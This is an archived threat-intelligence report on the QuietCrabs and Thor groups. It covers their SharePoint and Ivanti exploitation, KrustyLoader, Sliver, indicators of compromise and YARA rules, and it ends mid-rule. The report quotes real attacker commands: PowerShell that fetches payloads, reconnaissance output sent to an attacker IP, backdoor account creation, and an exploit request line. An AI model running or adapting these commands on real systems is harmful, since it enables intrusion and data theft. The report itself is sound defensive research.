{ "id": "986caf3e-f98e-4507-9d56-ed1e73417b69", "created_at": "2026-04-06T00:13:10.246427Z", "updated_at": "2026-04-10T03:24:34.017336Z", "deleted_at": null, "sha1_hash": "640b2ead9c53caeecfe0eddaedfd4b9b453e63e7", "title": "Dragons in Thunder", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 908983, "plain_text": "Dragons in Thunder\r\nBy Positive Technologies\r\nPublished: 2025-11-27 · Archived: 2026-04-05 16:50:20 UTC\r\nTable of contents:\r\nTable of contents:\r\nDragons in Thunder\r\nAuthors:\r\nAlexander Badayev\r\nThreat Intelligence Specialist at the Positive Technologies Expert Security Center\r\nKlimentiy Galkin\r\nThreat Intelligence Specialist at the Positive Technologies Expert Security Center\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 1 of 20\n\nVladislav Lunin\r\nLead Threat Intelligence Specialist of the Positive Technologies Expert Security Center Sophisticated Threat Research\r\nGroup\r\nKey findings\r\nDuring investigations into two incidents at Russian companies, we identified malicious activity that involved the\r\nexploitation of RCE vulnerabilities, including CVE-2025-53770 in Microsoft SharePoint, as well as CVE-2025-4427\r\nand CVE-2025-4428 in Ivanti Endpoint Manager Mobile.\r\nIn addition to the exploitation of vulnerabilities, we discovered samples of the KrustyLoader and Sliver malware,\r\nas well as traces of the Tactical RMM and MeshAgent tools.\r\nDetailed analysis showed the presence of at least two groups: QuietCrabs (also known as UTA0178 and UNC5221)\r\nand Thor.\r\nQuietCrabs were seen exploiting these vulnerabilities within just a few hours of PoC code being published.\r\nThe study suggests that Thor likely targeted around 110 Russian companies.\r\nGroup profile\r\nNo. Description\r\nQuietCrabs\r\nUTA0178,\r\nUNC5221, Red\r\nDev 61\r\nQuietCrabs is a threat group believed to be of Asian origin, whose primary objective\r\nis cyberespionage. Their attacks typically begin with the exploitation of known\r\nvulnerabilities, which has brought significant attention to their operations. The group\r\nis tracked under several different names and was first identified in early 2024;\r\nit remains active. Some researchers also link QuietCrabs to the larger APT27 group.\r\nVictim\r\ngeography\r\nThe U.S., UK, Germany, South Korea, Russia, Taiwan, the Philippines, Iran, the Czech\r\nRepublic, and a number of other countries\r\nMotivation Cyberespionage\r\nFirst\r\ndiscovered\r\nJanuary 2024\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 2 of 20\n\nLast active Ongoing\r\nNo. Description\r\nThor\r\nThor is a threat group first observed in attacks against Russian companies in 2025.\r\nAs final payloads, the attackers use LockBit and Babuk ransomware, as well as Tactical\r\nRMM and MeshAgent to maintain persistence. For initial access, they exploit publicly\r\nknown vulnerabilities.\r\nVictim\r\ngeography\r\nRussia\r\nMotivation Cyberespionage, data encryption\r\nFirst\r\ndiscovered May 2025\r\nLast active Ongoing\r\nMore detailed information about these groups is available on the PT Fusion TI portal.\r\nIntroduction\r\nWhile investigating the incidents, the Positive Technologies Expert Security Center Incident Response team\r\n(PT ESC IR), supported by the Threat Intelligence department (PT ESC TI), found evidence of KrustyLoader malware.\r\nKrustyLoader was first described in January 2024 by researchers at Volexity and Mandiant, in attacks that exploited zero-day RCE vulnerabilities in Ivanti Connect Secure. At that time, it was reported only in a Linux version, but Windows builds\r\nhave since appeared. Notably, at the time of this study the loader was being used by a single group, QuietCrabs.\r\nAs the investigation progressed, we also identified activity in the victim's infrastructure that pointed to another group.\r\nInterestingly, this second group appears to have disrupted QuietCrabs' attack and is likely the reason the attack attracted\r\nattention at all. We suppose that this second group is Thor. Based on analysis of the attackers' network infrastructure and\r\ntelemetry data, we conclude that Thor was running a large-scale campaign against Russian companies. To gain initial access,\r\nthe attackers exploited several remote code execution (RCE) vulnerabilities, including CVE-2025-53770 and CVE-2021-\r\n27065.\r\nIn this study, we describe the attack chains observed during the investigation and examine the tools used by the attackers.\r\nQuietCrabs activity\r\nInvestigating the incidents and proactively hunting for malicious files revealed attacks targeting multiple sectors in Russia\r\nand other countries. An approximate QuietCrabs attack flow is shown in Figure 1.\r\nFigure 1. Overall QuietCrabs attack flow\r\nQuietCrabs' attacks are characterized by mass internet scanning to find vulnerable servers. \r\nIn the first incident, QuietCrabs exploited CVE-2025-4427 and CVE-2025-4428 one day after Ivanti's official advisory.\r\nBelow is an example of how this exploitation appears in access.log. The output was written to a file with a .jpg extension\r\nand then retrieved by the attackers from the outside.\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 3 of 20\n\nGET /api/v2/featureusage_history?adminDeviceSpaceId=131\u0026format=${''.getClass().forName('java.lang.Runtime').getMethod('ge\r\nGET /mifs/images/PaKE5k.jpg\r\nIn the second incident, we found traces of successful exploitation of CVE-2025-53770 within 24 hours of a working exploit\r\nbeing published, and failed attempts within a few hours of the first, non-working exploits appearing.\r\nAfter gaining access to the SharePoint server, the group's actions followed roughly the following pattern:\r\nEstablish persistence on the vulnerable server by uploading an ASPX file that implements a simple web shell\r\n(described in the next section).\r\nRetrieve information about the external IP address and check file write permissions. Command example:\r\npowershell.exe -Command Invoke-WebRequest -Uri http://ifconfig[.]me -OutFile C:/Users/Public/Downloads/1.exe\r\nDownload the next stage from an external server. In this case, the next stage was KrustyLoader:.\r\npowershell.exe -Command Invoke-WebRequest -Uri http://omnileadzdev.s3.amazonaws[.]com/l9oWUjyPR6Gc -OutFile C:/Users/Publ\r\nUse KrustyLoader to download and run a Sliver implant:\r\n \r\nSliver is a cross-platform, open-source framework designed to emulate attacker activity or conduct penetration tests. It can\r\nbe used by organizations of any size to assess their security posture. Sliver implants connect to a C2 server over Mutual TLS\r\n(mTLS), WireGuard, HTTP, HTTPS, or DNS, and are dynamically compiled with asymmetric encryption keys for each\r\nbinary.\r\nSource: BishopFox / sliver (GitHub)\r\nDuring our analysis of the network infrastructure, we noticed that QuietCrabs used the hosting provider DigitalOcean. This\r\nchoice may be driven by their primary target region, North America: servers hosted there help their traffic blend in with US\r\ntraffic. At the same time, we also saw this hosting provider used in attacks against Russian companies. As a U.S.-based\r\nprovider, DigitalOcean does not help bypass geoblocking (unlike local or neutral providers) and may even make traffic\r\nharder to disguise, which highlights how unique QuietCrabs' tactics are.\r\nASPX web shell\r\nTo further secure their foothold, the attackers used an ASPX file—a basic web shell that returns command output as plain\r\ntext in the response. The web shell accepts two GET parameters: cmd and timeout. The first is responsible for the command\r\nto execute; the second sets the maximum execution time.\r\nThe command is wrapped in the try..catch block, encoded using Base64, and executed via the system utility\r\nScriptRunner.exe. If the command completes without errors, the output is written to:\r\nC:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\\u003cUUID\u003e\r\nAn example of an access.log entry showing command execution:\r\nGET /_layouts/15/ps_backdoor.aspx cmd=echo K046rywr6NOHae7m\r\nThe web shell then reads the command output from this file and sends it back to the attackers. A fragment of the script\r\nis shown in the figure below.\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 4 of 20\n\nFigure 2. Fragment of the ps_backdoor.aspx web shell\r\nJSP loader\r\nDuring the investigation, it became clear that QuietCrabs directly uploaded KrustyLoader by exploiting a vulnerability.\r\nNext, however, the Threat Intelligence team found a file in open sources that is a simple JSP loader. It is evident that similar\r\nsamples were used in attacks against Java applications. The loader's logic is as follows:\r\nRead the password from the pwd parameter of the query string and verify it. If it equals p@ss, proceed; otherwise,\r\nreturn the string 4c7c96d31ffaa6b8a5e86760edcb9294 in the response.\r\nRead the version number from the version parameter of the query string and write it to the file.\r\nDownload KrustyLoader from an external server at IP address 143.198.8[.]180 and run it.\r\nReturn the response: { «status»: 0 }.\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 5 of 20\n\nFigure 3. JSP loader code\r\nKrustyLoader\r\nKrustyLoader has already been covered by other researchers; here we briefly recap the main artifacts that can be found\r\non a system while it is running. KrustyLoader is a loader written in Rust. Its primary function is to decrypt a URL pointing\r\nto the payload, download that payload, inject it into a target process, and run it.\r\nAlmost all published studies focus on ELF x64 samples, and some vendors describe KrustyLoader exclusively as Linux\r\nmalware. In our case, however, all incident artifacts were Windows samples.\r\nA key feature of KrustyLoader is that it is unique malware associated with a single group—QuietCrabs. The attackers are\r\ngradually refining and updating this tool.\r\nOn startup, KrustyLoader copies itself to the %TEMP% folder using filename patterns listed below, where name is a name\r\nand gen_sym is a randomly generated string:\r\n.\u003cname\u003e.\u003cgen_sym\u003e.__selfdelete__.exe\r\n.\u003cname\u003e.\u003cgen_sym\u003e.__relocated__.exe\r\nThese files then act as markers that the system is infected. After copying, KrustyLoader deletes itself from its original\r\ndirectory. Then it initializes and transfers control to the part of the code obfuscated with control flow flattening (CFF).\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 6 of 20\n\nFigure 4. CFF initialization and dispatching\r\nIn the first dispatcher, KrustyLoader checks for the existence of the file C:\\Users\\Public\\Downloads\\0; in the second,\r\nit checks that this file is not empty. The contents of this file are used as a parameter for the tokio::sleep function.\r\nFigure 5. Verifying the file existence\r\nIn the third dispatcher, KrustyLoader verifies that it is running from C:\\Users\\Public\\Downloads.\r\nFigure 6. Target path check\r\nIn the fourth dispatcher, KrustyLoader first decrypts the URL used to obtain the payload. The URL is encrypted in two\r\nlayers: first with XOR, second with AES-128-CFB. All data is stored in the .text section; KrustyLoader locates it using\r\na marker.\r\nFigure 7. Data in the .text section\r\nA script to decrypt the URL is shown below:\r\n \r\nimport sys\r\n \r\nfrom Crypto.Cipher import AES\r\nfrom binascii import unhexlify\r\n \r\ndata = open(sys.argv[1], 'rb').read()\r\n \r\ntarget_dir = b\"c:/users/public/downloads/\"\r\n \r\nstart_target_dir = data.find(target_dir)\r\nstart_marker = data.find(b\"|||||||||||||||||\")\r\nstart_enc = start_marker - start_target_dir\r\n \r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 7 of 20\n\nencrypted =\r\nunhexlify(data[start_target_dir+len(target_dir):start_marker])\r\n \r\nxor_key_data_marker = b\"#####################\"\r\nstart_xor_key_marker = data.find(xor_key_data_marker)\r\nxor_key = data[start_xor_key_marker+len(xor_key_data_marker)]\r\n \r\nif (xor_key == 0x0F):\r\n xor_key_text_marker = b\"\\x41\\x80\\xF7\"\r\n start_xor_key_text_marker = data.find(xor_key_text_marker)\r\n xor_key = data[start_xor_key_text_marker+len(xor_key_text_marker)]\r\n \r\nencrypted_url = bytes([i^xor_key for i in encrypted])\r\n \r\naes_key = data[start_target_dir-32:start_target_dir-16]\r\naes_iv = data[start_target_dir-16:start_target_dir]\r\n \r\ncipher = AES.new(aes_key, AES.MODE_CFB, iv=aes_iv, segment_size=128)\r\ndecrypted = cipher.decrypt(encrypted_url)\r\nprint(decrypted.decode())\r\nKrustyLoader decrypts the payload using the same key and initialization vector as for the URL. The decryption script\r\nis shown below.\r\nimport sys\r\nfrom Crypto.Cipher import AES\r\n \r\nenc = …\r\nkey = …\r\niv = …\r\n \r\ncipher = AES.new(key, AES.MODE_CFB, iv=iv, segment_size=128)\r\nopen('decrypted', 'wb').write(cipher.decrypt(enc))\r\nNext, the payload is injected into the explorer.exe process and executed via the RtlCreateUserThread function.\r\nFigure 8. Payload injection into explorer.exe\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 8 of 20\n\nIn all samples we found, the payload was Sliver; however, other payloads cannot be ruled out. Figure 7 shows another URL.\r\nIn this sample it has the value ########, but if it were replaced with a plaintext URL, the payload at that URL would also\r\nbe downloaded and executed, this time by injecting it into cmd.exe.\r\nFigure 9. Payload injection into cmd.exe\r\nActivity of the second group\r\nWhile analyzing activity on the compromised hosts, we noticed that part of the tools did not overlap with what QuietCrabs\r\nuses. Moreover, unlike QuietCrabs, the second group operated much more noisily, relying on well-known tools and\r\ntechniques. In the incidents we investigated, this noisy behavior helped detect both groups in time and avoid more serious\r\nconsequences.\r\nAn example of Thor's initial reconnaissance commands:\r\npowershell -Command $r=(systeminfo); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -UseBasi\r\npowershell -Command $r=(tasklist); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -UseBasicPa\r\npowershell -Command $r=(whoami /priv); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -UseBas\r\npowershell -Command $r=(nltest /dclist:); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -Use\r\npowershell -Command $r=(nltest /trusted_domains); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($\r\npowershell -Command $r=('powershell Test-NetConnection 95.142.40[.]51 -Port 4444 ; iwr -Uri ('http://95.142.40[.]51:8888/?\r\nNext, the attackers created a user account srv using the command below and added this account to the local administrator\r\ngroup.\r\npowershell -Command $r=(net user srv Brooklin2025! /add); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDat\r\nThe group used the ADRecon utility, which they downloaded to C:\\users\\public\\ad_ru.ps1, to perform Active Directory\r\ndomain reconnaissance. The results were written to a file that the attackers later viewed:\r\nfile:///C:/Users/\u003cUser\u003e/Desktop/ADRecon-Report-\u003cdate\u003e.zip\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 9 of 20\n\nThey also used certutil to download various PowerShell scripts:\r\ncertutil.exe -urlcache -split -f http://95.142.40[.]51:654/exec.ps1 $public\\\\sql.ps1\r\nTo escalate privileges, the group used the publicly available GodPotato tool, and for data extraction they relied on utilities\r\nsuch as secretsdump and mimikatz.\r\nData collected by the group included credentials for local and domain users, mail servers, and employees' Telegram sessions.\r\nTo collect user files, they used Rclone.\r\nAs a result, if not for the second group's activity and its use of widely known tools, QuietCrabs would likely have remained\r\nundetected.\r\nBy correlating these findings, we were able to find a similar description and matching indicators of compromise in a report\r\npublished by Angara Security on August 19. Their researchers attribute the attack to the Thor group that uses LockBit and\r\nBabuk ransomware. In our case, the attack was detected early enough that these malicious tools were not observed.\r\nGiven the overlap in tools, techniques, and indicators of compromise, we assume that Thor is behind this attack.\r\nAn approximate Thor attack flow is shown in the figure below.\r\nFigure 10. Thor attack flow\r\nCorrelation between the groups actions\r\nDuring the investigation, we noticed an unusual pattern: QuietCrabs and the presumed Thor group operated in almost the\r\nsame time period. The gap between their malicious activities was only a few days. It is also important that the investigation\r\nbegan at the point where Thor activity was first registered. In other words, QuietCrabs could have remained inside the\r\ninfrastructure for much longer if not for Thor.\r\nThat said, we cannot confidently state that QuietCrabs is collaborating with Thor. In this case, the overlap is most likely\r\ncoincidental, as both QuietCrabs and Thor conduct broad scans of organizations for subsequent compromise.\r\nThor's victims\r\nBased on telemetry-driven analysis of the attackers' network infrastructure, we found that the group scanned about\r\n145 servers. On 101 of them we identified vulnerabilities, mostly from 2021, with a total of 269 unique vulnerabilities.\r\nFigure 11. Top vulnerabilities observed on servers of potential victims\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 10 of 20\n\n91 91 91 91\r\n46 46 46 46\r\n9\r\n5 5 5 5 5 5\r\nCVE-2…\r\nCVE-2021-31206\r\nCVE-2021-34523\r\nCVE-2021-31207\r\nCVE-2021-26858\r\nCVE-2021-26857\r\nCVE-2021-26855\r\nCVE-2021-27065\r\nCVE-2014-4078\r\nCVE-2023-44487\r\nCVE-2021-23017\r\nCVE-2021-3618\r\nCVE-2013-4365\r\nCVE-2009-0796\r\nCVE-2007-4723 © Positive Technologies\r\nWe were able to identify around 110 Russian companies as potential victims. The affected organizations varied greatly both\r\nin economic sector and in the potential profit they offered the attackers.\r\nFigure 12. Number of victims across different economic sectors\r\n1%\r\n2%\r\n2%\r\n2%\r\n2%\r\n3%\r\n4%\r\n5%\r\n5%\r\n5%\r\n7%\r\n8% 8%\r\n11%\r\n13%\r\n19%\r\nEnergy Aerospace\r\nResearch companies\r\nDefense industry Healthcare\r\nFuel and energy sector\r\nSoftware development Tourism\r\nMedia Logistics Education\r\nAgriculture\r\nInformation technologies\r\nGovernment agencies\r\nConstruction Consulting\r\nNon-governmental organizations\r\nTrade Industry\r\n© Positive Technologies\r\nWe described similar attacks against vulnerable servers in our article on malicious code injected into Microsoft Outlook\r\nauthentication pages. In both cases, the victims included not only small and medium-sized businesses but also defense\r\nindustry enterprises, healthcare organizations, and research centers.\r\nAll vulnerable servers were located in Russia, which indicates that Thor's attacks were clearly targeted at Russian\r\ninfrastructure.\r\nConclusions\r\nThe attacks attributed to Thor affected many Russian companies. The group did not rely on sophisticated techniques\r\nor unique tools. With a well-designed infrastructure and mature security processes, these attacks could have been prevented\r\nor at least quickly contained.\r\nBy contrast, QuietCrabs' attacks posed a more serious threat. The attackers used exploits shortly after new vulnerabilities\r\nwere disclosed: the gap between a patch release and the first attack ranged from a few days to just a few hours. According\r\nto Mandiant's investigations, QuietCrabs' average dwell time in victim infrastructure is 393 days.\r\nPositive Technologies product verdicts\r\nPT Sandbox\r\napt_win_ZZ_QuietCrabs__Trojan__KrustyLoader\r\ntool_win_ZZ_Sliver__Backdoor\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 11 of 20\n\nPT Sandbox\r\ntool_multi_ZZ_WebShell__Backdoor__ASPX\r\ntool_multi_ZZ_TacticalRMM__RemoteAdmin\r\ntool_multi_ZZ_MeshAgent__RemoteAdmin\r\nDownload as:\r\nMaxPatrol SIEM\r\nRun_Masquerading_Executable_File\r\nSuspicious_Connection\r\nSuspicious_Connection_System_Process\r\nSuspicious_Directory_For_Process\r\nDownload as:\r\nPT NAD\r\nTOOLS [PTsecurity] Possible TacticalRMM Agent sid: 10012568, 10012570\r\nTOOLS [PTsecurity] TacticalRMM Agent TLS request sid: 10014669\r\nLOADER [PTsecurity] Trojan.Loader Requesting TacticalRMM Agent sid: 10014662\r\nTOOLS [PTsecurity] Possible MeshCentral Agent sid: 10010286, 10010288\r\nREMOTE [PTsecurity] MeshAgent switching to websocket C2 sid: 10014396\r\nTOOLS [PTsecurity] Sliver C2 HTTP Key exchange (Base64 modified alphabet) sid: 10011011,\r\n10015574\r\nDownload as:\r\nIndicators of compromise\r\nMore indicators of compromise can be found on the PT Fusion TI portal.\r\nFile-based IoCs associated with QuietCrabs\r\nKrustyLoader\r\nMD5 hashes SHA-1 hashes SHA-256 hashes\r\nf662135bdd8bf792a941ea222e8a1330 fa645f33c0e3a98436a0161b19342f78683dbd9d 1d26fff4232bc64f9ab3c2b09281d932dd6afb84a2\r\naed7eef30dbb0e95290b82d8cdb80cef 5b86889fd1d7de954d7d331bb85a0f97942be1a7 6b938659bc6f705c0665220d234e4c4d158fd10a9\r\n88c13ad71798482ab15da86fed33a09d d659ddf993c29e79d3da25cfffa0891a0f4773e6 14aa7dd13b4724a9e195eee5260ee53d96dc4fedd\r\n4336ce2c934bdabc0ef24ebc883a97b5 579d9ae609248977dace45702fa120ca3f282bef 15fbedc076f10b630e724ace21f6b7ef34235cf1e3\r\n071d0f76e0af21f0a6903523abe90d33 398da9c0a39b2090024ba4a318a452517da93898 18a98a738138aacbcdaac1164e422be12e14b1abe\r\n120df631123af5a9273b0f9b3b7592d3 bfcb8bd83bfa415d6e1c21a7686f2e79aea18d7a 36dc557b4ea173d9537392f64c1a9527a5832ca99\r\n29bc17fa1e32bee1c5beb4f556b1e59a 158119e7464af7d4f14d137a046de8adffef25d0 53c69869a6e186f1cd5f3908e59f2d77d25385642\r\n34d118e804d3eb46c82cfbcb73772abe c6783e6594f785f918f0d0d458854bc3cf02b9a4 288eed2f19b5087d074a291a55abafa206bdc7b93\r\n04b6bf6e2538a5a4043258185a1fd853 a33acd32396b82e29c57288aa380de2e85c523c2 301b292e8ee27a366c78231b61a47bae9fcaf4cd8\r\n0307d0b1ce5aca62021ddd4cc6a8de16 e6d205645eb2ae1e1ed829d8dda29fcb17e98a47 359eb9d53218b243653bcf9d64fd394302d2ea59\r\n6900e844f887321f22dd606a6f2925ef da23dab4851df3ef7f6e5952a2fc9a6a57ab6983 1544d9392eedf7ae4205dd45ad54ec67e5ce831d2\r\n93f705625e504056b43846a651be4388 f4018fb54955905bb273a10b512086ac386311bf 1703df147df01e0487d5419b87bb7452cff6b9e5f\r\n1d154306cb0824433bbf2674fac0e236 4b394640c378082c6a96769ecd48894925d1d7f1 a92e51dfc17216802cb9a74f043bf6feabfd0cad3b\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 12 of 20\n\nMD5 hashes SHA-1 hashes SHA-256 hashes\r\n7a28a7c154bd43143379d155ab25f909 3daf463d4b482f30b640d48685de44d37dc17b27 b3e8dff5de434fd4057526e56367c2b9a31158140\r\n8c8681e805e0ae7a7d1a609efc000c84 17d65a9d8d40375b5b939b60f21eb06eb17054fc b8e56de3792dbd0f4239b54cfaad7ece3bd42affa4\r\n8606677c19f88593016fcc343d9518ea 8f47d35628b059ee04504f26df2ff82e46d9af5a bdb9a4c1532b5ba38fd8a9c01430f2db4cd74ee01\r\n824b35ae209996f415815cba7006c155 7c5e8fd9631d17443f9cdaf9f0da5a5e9fb89509 cfb7968331bf1289b3ec71765ca42549d2aa17669\r\n6c93ea4895ba0085a1de515f206b1699 6fa91bdc9a6a4bfe2dc3ee020ff1cbf84ba304fb d3be673d536574b4027f2d9176457760f109b77e\r\n445d5e5944a77c7f367bf09d97edf2c4 d7ccfa0a9ca30c6b631ab638e95101b5e1ceb5ca dad3d871e48ecf1bc022914f6ba471dbc2e0f8614\r\ne313eeee1d146d6e1b800a49fdaaa0ca c593bdd8dbd6e434848543c2d1ee4fa1b150b9b4 db88cb8ee5672afab012376a8add1e8362e75c1e6\r\n088cafef0b7a6aca4bda65a91e79a34a 7c0b195fc4b820450e14fd8104574e62a3cda8d8 e4e7c6bd2250b513383839f6ff805cb333a957530\r\nde15e309e157b46d97dbec5849945c1c a8f7bf6302c5ccd9888d31289229426008b7e2d6 e5abc07aa76e6c1997d6a732cbd1b51b14badfbed\r\n5b81a0fa12e8fad652fbaa77ee9242dc ca24f43e6cdce43ba4852a5974271686725084e0 f7c0917e19af0282da27d54dd951f78042965fe6d\r\n765a29cc2645f0edfdd33ed59db3f2dc 74dea4e8930cac7f8d9a63989fbd6bb27ae7c598 7c2dcf05663b71877e2650d63c52a624ca7319e40\r\n7d190efc6f17869ee01cf667c90d0211 582a672fb25cdf248e5a67630468225e8a8af7ef 32b40914bf7d01b2b0c3536835314f03f07ea8108\r\nabc167768fb1113e21428499745a239f b56ece0eafff9b8c79aba879a115fb01a5905f29 929e3fdd3068057632b52ecdfd575ab389390c852\r\nf46539cb4c18bccf3ccd35dbd973c901 3a5286acc24ec8c933182fcaccc094de148d8e06 2890a9970502a7c20477a437571a260cb96375e6\r\n2fcde88eedb3414b9f0ce60fad83bf45 4d42b371508256000cd5de530ca0131d51939421 9558d1f46182f5275c8a5578bc8dad63ad776b7f1\r\n6cd3e6ece8d01858faf562b77903bc43 1604a8130412e6824dca40b38a91114ffbc6bfe4 c8d64b4eb7c21ae03595576cb633b2b831e82496\r\ne83a67a484b56684f1c7cc8cb0f071e4 d40e81552c778a66b2ca01eb38245acc63a19d5b dd4f25657c4df7983c0d12b597df1ce737eeebd1c\r\n88576ff9320ae2c6de87dc6082f02527 0836c7c544f231d6995f7a87b34b2c8875328b17 ea41a8f0aa1c0dc365258902bde3e87529e4af2a8\r\nfd9a345badc25e6d58361becb517a0c2 d61c9eba6d8267ed5836f670f58c9b12a737f89d f6665f41a2ea7c5eacbd908210ab332ba9a1f60c14\r\nDownload as:\r\nSliver\r\nMD5 hashes SHA-1 hashes SHA-256 hashes\r\n23439741ee63a4ff744e5c3ab1fbba3d 69840ab5f82d90c3d9747e20f44d84209c9e3eb4 3581d7ef15130fe82e34ee431985f101fbeb96857\r\nc4df40b8250a72ef394a6d844765cbda 7cb4aee887a9e39b4cb9cd4c9c2cff3b037d85b5 8f651136b7ba3d63d018a6f12ffd073d1c0033e7b\r\n070170515d7d1d982164a5a3dd96d5e3 db3918814d6cb13257ba9e55e6adb1b090a422a6 1a17367608e79dba1e63348e5d791ff1658621bf8\r\n6ca0408e78c732f533dee2bd84df9961 28a4b6c7fd996ce277e4e4fcb7f83df529164afb 21b8e487d5879ff08d01316dbfb298e1c5e93b560\r\n4e37da111b8be06a8fa3312cde33b79e 979709f50797b992e07cbc2b0779509c5edd516c 52ec5c307cc5ba5790434bbf334168d22ed8b7e20\r\nb3049fd5189440246472bbd3216f7038 78494559881d5e8192f82d5e9a6e8b0b8e96449e 8e551182f760435151052778c9f51e8cfa6637ef2\r\n31c14a5c7bdb550a950a784c77840712 1c28b0871c5549e9f4dbc60b08e547d4fd786be0 20683be010f0ca076bf5b0a0ee0838c116f7554ce\r\ne60d9dee3ead2d70be5824d7659a134f cbd9938805af96b4b6bee1865a27272f62340085 a2326928c3ec6630e60642f0284ed994185efbfce\r\nDownload as:\r\nNetwork IoCs associated with QuietCrabs\r\nIndicators\r\ndjango-server.s3.amazonaws.com\r\nomnileadzdev.s3.amazonaws.com\r\nspyne-test.s3.amazonaws.com\r\nkia-almotores.s3.amazonaws.com\r\ndevscout.s3.amazonaws.com\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 13 of 20\n\nIndicators\r\ntnegadge.s3.amazonaws.com\r\ngaadhi.s3.amazonaws.com\r\nsay2me.s3.amazonaws.com\r\nlevar-viewer.s3.amazonaws.com\r\ngtisstorage.s3.amazonaws.com\r\ncdn-chromos.s3.amazonaws.com\r\nballour.s3.amazonaws.com\r\nthe-mentor.s3.amazonaws.com\r\nlive-360.s3.amazonaws.com\r\nanc-media.s3.amazonaws.com\r\ncheck.learnstore.vip\r\nmusic.learnstore.vip\r\nupdate.learnstore.vip\r\napi.learnstore.vip\r\nvideo-dev.learnstore.vip\r\napi-dev.learnstore.vip\r\nmusic-dev.learnstore.vip\r\ncheck-dev.learnstore.vip\r\n143.198.8.180\r\n174.138.95.60\r\n157.245.175.86\r\n165.232.162.99\r\n167.172.64.55\r\n167.172.77.125\r\n178.128.124.227\r\n178.128.53.239\r\n207.154.235.215\r\n213.183.54.111\r\n216.45.58.177\r\n223.76.236.178\r\n223.76.236.179\r\n23.95.193.164\r\n64.226.98.34\r\n8.211.157.186\r\n134.122.25.236\r\n138.68.94.205\r\n156.238.224.82\r\n139.59.39.19\r\nDownload as:\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 14 of 20\n\nNetwork IoCs associated with Thor\r\nIndicators\r\n95.142.40.51\r\n161.97.136.74\r\n194.14.217.63\r\n213.183.57.51\r\n188.127.241.179\r\n91.231.186.5\r\n192.121.113.123\r\n192.121.171.245\r\n194.68.44.151\r\nDownload as:\r\nFile signatures\r\nrule PTESC_apt_win_ZZ_QuietCrabs__Trojan__KrustyLoader {\r\n strings:\r\n $code = {\r\n BF ?? ?? ?? ??\r\n 48 8D ?D ?? ?? ?? ??\r\n [0-9]\r\n 81 FF ?? ?? ?? ??\r\n 74 ??\r\n [0-1] 81 FF ?? ?? ?? ??\r\n 74 ??\r\n [0-1] 81 FF ?? ?? ?? ??\r\n 0F 84 ?? ?? ?? ??\r\n [0-1] 81 FF ?? ?? ?? ??\r\n 0F 85 ?? ?? ?? ??\r\n E9\r\n }\r\n $s1 = \"[-]ResumeThread failed: \"\r\n $s2 = \"[-]Unknow IMAGE_OPTIONAL_HEADER type for machine type: \"\r\n condition:\r\n ((uint16(0) == 0x5a4d) and (all of them))\r\n}\r\n \r\nrule PTESC_tool_win_ZZ_Sliver__Backdoor {\r\n strings:\r\n $c = {\r\n 0F B6 54 0C ??\r\n 0F B6 5C 0C ??\r\n 31 DA\r\n 88 14 08\r\n 48 FF C1\r\n 48 83 F9 0C\r\n 7C\r\n }\r\n $r = /([a-z]{10}\\/){4}[a-z]{10}\\.\\(\\*[A-Z][a-z]{9}\\)/\r\n $s_bishopfox = \"bishopfox\"\r\n $s_github = \"github.com/bishopfox/sliver\"\r\n $s_obf1 = \".Cleanup.func\"\r\n $s_obf2 = \".ConnectRemote.func\"\r\n $s_obf3 = \".SessionInit.func\"\r\n $s_obf4 = \".func500\"\r\n $s_obf5 = \".makeConnectedServerPipe.func\"\r\n $s_obf6 = \".phpURL.func\"\r\n $s_obf7 = \".readWinHttpProxy.func\"\r\n $s_obf8 = \".txtURL.func\"\r\n $s_obf9 = /main\\.[a-z]{10}\\.func5/\r\n $s_sliver = \"sliver\"\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 15 of 20\n\ncondition:\r\n uint16(0) == 0x5A4D and (all of ($s_obf*) or (#s_sliver \u003e 100 and #s_bishopfox \u003e 100) or any of ($c*) or (any of (\r\n}\r\nrule PTESC_tool_multi_ZZ_WebShell__Backdoor__ASPX {\r\n strings:\r\n $asp = \"\u003c%@\"\r\n $cmd = \"cmd.exe\"\r\n $p1 = \"Process()\"\r\n $p2 = \"System.Diagnostics.Process\"\r\n $p3 = \"new Process\"\r\n $v1 = \"Response.Write(\"\r\n $v2 = \".Start(\"\r\n $v3 = \"UseShellExecute\"\r\n $v4 = \"RedirectStandardOutput\"\r\n $v5 = \"RedirectStandardInput\"\r\n $v6 = \"Request.Params[\"\r\n $v7 = \"Request.Headers[\"\r\n $v8 = \"Request.Files[\"\r\n 